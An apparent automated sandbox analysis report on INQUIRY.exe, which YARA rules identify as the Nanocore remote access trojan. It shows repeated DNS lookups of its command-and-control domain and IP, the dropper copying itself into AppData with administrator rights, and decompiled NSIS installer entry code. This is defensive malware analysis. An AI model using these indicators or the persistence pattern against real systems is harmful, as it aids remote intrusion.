Jan 24, 2022 02:24:20.152194977 CET	8.8.8.8	192.168.2.4	0xf62e	No error (0)	onyeoma.ddns.net	185.140.53.6	A (IP address)	IN (0x0001)
Jan 24, 2022 02:24:26.623925924 CET	8.8.8.8	192.168.2.4	0xcfe8	No error (0)	onyeoma.ddns.net	185.140.53.6	A (IP address)	IN (0x0001)
Jan 24, 2022 02:24:31.236319065 CET	8.8.8.8	192.168.2.4	0xbee8	No error (0)	onyeoma.ddns.net	185.140.53.6	A (IP address)	IN (0x0001)
Jan 24, 2022 02:24:37.283354044 CET	8.8.8.8	192.168.2.4	0x8d19	No error (0)	onyeoma.ddns.net	185.140.53.6	A (IP address)	IN (0x0001)
Jan 24, 2022 02:24:43.325751066 CET	8.8.8.8	192.168.2.4	0xd83c	No error (0)	onyeoma.ddns.net	185.140.53.6	A (IP address)	IN (0x0001)
Jan 24, 2022 02:24:50.367348909 CET	8.8.8.8	192.168.2.4	0x3947	No error (0)	onyeoma.ddns.net	185.140.53.6	A (IP address)	IN (0x0001)
Jan 24, 2022 02:24:56.376116037 CET	8.8.8.8	192.168.2.4	0xd465	No error (0)	onyeoma.ddns.net	185.140.53.6	A (IP address)	IN (0x0001)
Jan 24, 2022 02:25:02.430704117 CET	8.8.8.8	192.168.2.4	0x9325	No error (0)	onyeoma.ddns.net	185.140.53.6	A (IP address)	IN (0x0001)
Jan 24, 2022 02:25:08.907834053 CET	8.8.8.8	192.168.2.4	0xc690	No error (0)	onyeoma.ddns.net	185.140.53.6	A (IP address)	IN (0x0001)
Jan 24, 2022 02:25:14.871570110 CET	8.8.8.8	192.168.2.4	0xd813	No error (0)	onyeoma.ddns.net	185.140.53.6	A (IP address)	IN (0x0001)
Jan 24, 2022 02:25:20.955882072 CET	8.8.8.8	192.168.2.4	0xa7ba	No error (0)	onyeoma.ddns.net	185.140.53.6	A (IP address)	IN (0x0001)
Jan 24, 2022 02:25:27.027782917 CET	8.8.8.8	192.168.2.4	0x6dd9	No error (0)	onyeoma.ddns.net	185.140.53.6	A (IP address)	IN (0x0001)
Jan 24, 2022 02:25:33.435841084 CET	8.8.8.8	192.168.2.4	0xd584	No error (0)	onyeoma.ddns.net	185.140.53.6	A (IP address)	IN (0x0001)
Jan 24, 2022 02:25:39.586961031 CET	8.8.8.8	192.168.2.4	0x3bc	No error (0)	onyeoma.ddns.net	185.140.53.6	A (IP address)	IN (0x0001)
Jan 24, 2022 02:25:45.694015980 CET	8.8.8.8	192.168.2.4	0x5c16	No error (0)	onyeoma.ddns.net	185.140.53.6	A (IP address)	IN (0x0001)
Jan 24, 2022 02:25:51.704018116 CET	8.8.8.8	192.168.2.4	0xe7ef	No error (0)	onyeoma.ddns.net	185.140.53.6	A (IP address)	IN (0x0001)
Jan 24, 2022 02:25:57.998338938 CET	8.8.8.8	192.168.2.4	0xf5f7	No error (0)	onyeoma.ddns.net	185.140.53.6	A (IP address)	IN (0x0001)
Jan 24, 2022 02:26:04.066617966 CET	8.8.8.8	192.168.2.4	0x588d	No error (0)	onyeoma.ddns.net	185.140.53.6	A (IP address)	IN (0x0001)
Jan 24, 2022 02:26:10.220319033 CET	8.8.8.8	192.168.2.4	0x7508	No error (0)	onyeoma.ddns.net	185.140.53.6	A (IP address)	IN (0x0001)
Jan 24, 2022 02:26:16.639257908 CET	8.8.8.8	192.168.2.4	0x1c3a	No error (0)	onyeoma.ddns.net	185.140.53.6	A (IP address)	IN (0x0001)

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: INQUIRY.exePID: 6904, Parent PID: 6092

General

Start time:	02:24:10
Start date:	24/01/2022
Path:	C:\Users\user\Desktop\INQUIRY.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\INQUIRY.exe"
Imagebase:	0x400000
File size:	315125 bytes
MD5 hash:	DC0ACC75361BB39FBD4ABEC6EDC82CD5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: INQUIRY.exePID: 7084, Parent PID: 6904

General

Start time:	02:24:12
Start date:	24/01/2022
Path:	C:\Users\user\Desktop\INQUIRY.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\INQUIRY.exe"
Imagebase:	0x400000
File size:	315125 bytes
MD5 hash:	DC0ACC75361BB39FBD4ABEC6EDC82CD5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000000.663644960.0000000000414000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000000.663644960.0000000000414000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000002.00000000.663644960.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.918797240.00000000039A2000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: rstmgknbahw.exePID: 6472, Parent PID: 3424

General

Start time:	02:24:23
Start date:	24/01/2022
Path:	C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe"
Imagebase:	0x400000
File size:	315125 bytes
MD5 hash:	DC0ACC75361BB39FBD4ABEC6EDC82CD5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: rstmgknbahw.exePID: 1904, Parent PID: 6472

General

Start time:	02:24:29
Start date:	24/01/2022
Path:	C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe"
Imagebase:	0x400000
File size:	315125 bytes
MD5 hash:	DC0ACC75361BB39FBD4ABEC6EDC82CD5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.725196610.000000000390A000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000002.725196610.000000000390A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: NanoCore, Description: unknown, Source: 00000004.00000002.725133013.00000000028DE000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000000.702725030.0000000000414000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000000.702725030.0000000000414000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000000.702725030.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: rstmgknbahw.exePID: 4296, Parent PID: 3424

General

Start time:	02:24:31
Start date:	24/01/2022
Path:	C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe"
Imagebase:	0x400000
File size:	315125 bytes
MD5 hash:	DC0ACC75361BB39FBD4ABEC6EDC82CD5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: rstmgknbahw.exePID: 5320, Parent PID: 4296

General

Start time:	02:24:37
Start date:	24/01/2022
Path:	C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe"
Imagebase:	0x400000
File size:	315125 bytes
MD5 hash:	DC0ACC75361BB39FBD4ABEC6EDC82CD5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: NanoCore, Description: unknown, Source: 00000006.00000002.734941801.00000000027AE000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.735022366.00000000037DA000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000006.00000002.735022366.00000000037DA000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.734386129.0000000000625000.00000004.00000020.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.734386129.0000000000625000.00000004.00000020.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000006.00000002.734386129.0000000000625000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000000.718272419.0000000000414000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000000.718272419.0000000000414000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000006.00000000.718272419.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: INQUIRY.exePID: 6904, Parent PID: 6092COMMON

Execution Graph

Execution Coverage:	25.2%
Dynamic/Decrypted Code Coverage:	8.4%
Signature Coverage:	22.4%
Total number of Nodes:	1372
Total number of Limit Nodes:	33

Executed Functions

Function 00403225 Relevance: 72.0, APIs: 23, Strings: 18, Instructions: 270
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				intOrPtr _t71;
				intOrPtr _t77;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				intOrPtr _t113;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423f58 = _t34;
				 *0x423ea4 = E00405DA3(8);
				SHGetFileInfoA(0x41f450, 0,  &_v360, 0x160, 0); // executed
				E00405A85("heifsmlbdxlebvytfzg Setup", "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\jones\\Desktop\\INQUIRY.exe\" ";
				E00405A85(_t96, _t39);
				 *0x423ea0 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\jones\\Desktop\\INQUIRY.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00429001;
				}
				_t44 = CharNextA(E004055A3(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E004055A3(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								_t45 = _t44 + 2;
								__eflags = _t44 + 2;
								E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t45);
								L20:
								_t105 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105); // executed
								_t48 = E004031F1(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C5B(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E004035A6();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x423f34; // 0x0
											if(__eflags != 0) {
												_t106 = E00405DA3(3);
												_t100 = E00405DA3(4);
												_t55 = E00405DA3(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x423f4c; // 0xffffffff
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E00405346(_v408, 0x200010);
										ExitProcess(2);
									}
									_t113 =  *0x423ebc; // 0x0
									if(_t113 == 0) {
										L31:
										 *0x423f4c =  *0x423f4c | 0xffffffff;
										_v400 = E004035E3();
										goto L32;
									}
									_t103 = E004055A3(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										_t101 = "C:\\Users\\jones\\Desktop";
										if(lstrcmpiA(_t105, "C:\\Users\\jones\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t101);
										}
										E00405A85(0x424000, _v396);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											_t71 =  *0x423eb0; // 0x51d818
											E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)(_t71 + 0x120)));
											DeleteFileA(0x41f050);
											if(_v416 != 0 && CopyFileA("C:\\Users\\jones\\Desktop\\INQUIRY.exe", 0x41f050, 1) != 0) {
												_push(0);
												_push(0x41f050);
												E004057D3();
												_t77 =  *0x423eb0; // 0x51d818
												E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)(_t77 + 0x124)));
												_t79 = E004052E5(0x41f050);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E004057D3();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E00405659(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
									E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E004031F1(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}

0x00403231
0x00403235
0x0040323d
0x0040323f
0x00403244
0x0040324f
0x00403256
0x0040325e
0x00403268
0x0040327e
0x0040328e
0x00403293
0x00403299
0x004032a0
0x004032b3
0x004032b8
0x004032ba
0x004032bc
0x004032c1
0x004032c1
0x004032d1
0x004032d7
0x00403340
0x00403340
0x00403342
0x00403344
0x00000000
0x00000000
0x004032dd
0x004032e0
0x004032e8
0x004032e8
0x004032eb
0x004032f0
0x004032f2
0x004032f2
0x004032f3
0x004032f3
0x004032f8
0x004032fb
0x00403330
0x00403335
